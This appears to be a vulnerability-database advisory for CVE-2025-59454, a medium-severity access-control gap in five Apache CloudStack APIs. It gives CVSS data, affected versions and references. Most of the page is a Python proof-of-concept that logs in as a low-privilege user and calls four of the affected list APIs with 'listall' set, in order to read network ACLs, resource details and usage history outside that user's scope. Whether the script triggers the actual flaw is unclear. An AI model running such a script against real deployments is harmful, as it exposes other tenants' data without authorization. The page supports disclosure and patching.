Security Vulnerability Report
CVE-2025-59454 CVSS 4.3 MEDIUM

CVE-2025-59454

Published: 2025-11-27 12:15:48
Last Modified: 2025-12-02 14:38:08

Description

In Apache CloudStack, a gap in access control checks affected the APIs:
- createNetworkACL
- listNetworkACLs
- listResourceDetails
- listVirtualMachinesUsageHistory
- listVolumesUsageHistory

While these APIs were accessible only to authorized users, insufficient permission validation meant that users could occasionally access information beyond their intended scope. Users are recommended to upgrade to Apache CloudStack 4.20.2.0 or 4.22.0.0, which fixes the issue.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:apache:cloudstack:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:apache:cloudstack:4.21.0.0:*:*:*:*:*:*:* - VULNERABLE
Apache CloudStack < 4.20.2.0
Apache CloudStack 4.21.x
Apache CloudStack < 4.22.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-59454 Apache CloudStack Access Control Bypass PoC
# Requires authenticated session with valid user credentials
import requests
import json

# Configuration
TARGET_URL = "https://target-cloudstack-server.com"
API_KEY = "your_api_key"
SECRET_KEY = "your_secret_key"
SESSION_USER = "[email protected]"
SESSION_PASSWORD = "password123"


def login():
    """Authenticate to CloudStack and obtain session cookie"""
    login_url = f"{TARGET_URL}/api"
    login_data = {
        "command": "login",
        "username": SESSION_USER,
        "password": SESSION_PASSWORD,
        "domain": "/",
        "response": "json"
    }
    response = requests.post(login_url, data=login_data)
    return response.cookies


def exploit_list_network_acls(cookies):
    """Exploit CVE-2025-59454: List Network ACLs beyond authorized scope"""
    api_url = f"{TARGET_URL}/api"
    payload = {
        "command": "listNetworkACLs",
        "listall": "true",  # Key parameter for exploitation
        "response": "json"
    }
    response = requests.get(api_url, params=payload, cookies=cookies)
    return response.json()


def exploit_list_resource_details(cookies):
    """Exploit CVE-2025-59454: List Resource Details beyond authorized scope"""
    api_url = f"{TARGET_URL}/api"
    payload = {
        "command": "listResourceDetails",
        "listall": "true",
        "resourcetype": "UserVm",
        "response": "json"
    }
    response = requests.get(api_url, params=payload, cookies=cookies)
    return response.json()


def exploit_list_vm_usage_history(cookies):
    """Exploit CVE-2025-59454: List VM Usage History beyond authorized scope"""
    api_url = f"{TARGET_URL}/api"
    payload = {
        "command": "listVirtualMachinesUsageHistory",
        "listall": "true",
        "response": "json"
    }
    response = requests.get(api_url, params=payload, cookies=cookies)
    return response.json()


def exploit_list_volume_usage_history(cookies):
    """Exploit CVE-2025-59454: List Volume Usage History beyond authorized scope"""
    api_url = f"{TARGET_URL}/api"
    payload = {
        "command": "listVolumesUsageHistory",
        "listall": "true",
        "response": "json"
    }
    response = requests.get(api_url, params=payload, cookies=cookies)
    return response.json()


def main():
    print("[*] CVE-2025-59454 Apache CloudStack Access Control Bypass")
    print("[*] Target: Apache CloudStack < 4.20.2.0 or < 4.22.0.0")

    # Step 1: Authenticate with low-privilege account
    print("\n[1] Authenticating with low-privilege user...")
    cookies = login()

    # Step 2: Exploit access control bypass
    print("[2] Exploiting access control bypass...")
    print("[*] Fetching Network ACLs (potentially unauthorized)...")
    network_acls = exploit_list_network_acls(cookies)
    print("[*] Fetching Resource Details (potentially unauthorized)...")
    resource_details = exploit_list_resource_details(cookies)
    print("[*] Fetching VM Usage History (potentially unauthorized)...")
    vm_usage = exploit_list_vm_usage_history(cookies)
    print("[*] Fetching Volume Usage History (potentially unauthorized)...")
    volume_usage = exploit_list_volume_usage_history(cookies)

    # Step 3: Analyze results
    print("\n[3] Analyzing collected data...")
    # CloudStack wraps list results as {"listnetworkaclresponse": {"count": N, "networkacl": [...]}},
    # so count the entries under "networkacl" rather than the keys of the wrapper object
    acls = network_acls.get('listnetworkaclresponse', {}).get('networkacl', [])
    if acls:
        print(f"[!] Retrieved {len(acls)} Network ACLs")

    print("\n[*] Exploitation complete")
    return True


if __name__ == "__main__":
    main()

References

- https://lists.apache.org/thread/0hlklvlwhzsfw39nocmyxb6svjbs9xbc (Mailing List, Vendor Advisory)
- http://www.openwall.com/lists/oss-security/2025/11/27/3 (Mailing List, Third Party Advisory)

Weakness: CWE-200 (Exposure of Sensitive Information to an Unauthorized Actor)

Affected version ranges from the NVD configuration data: Apache CloudStack 4.0.0 up to, but excluding, 4.20.2.0; and Apache CloudStack 4.21.0.0.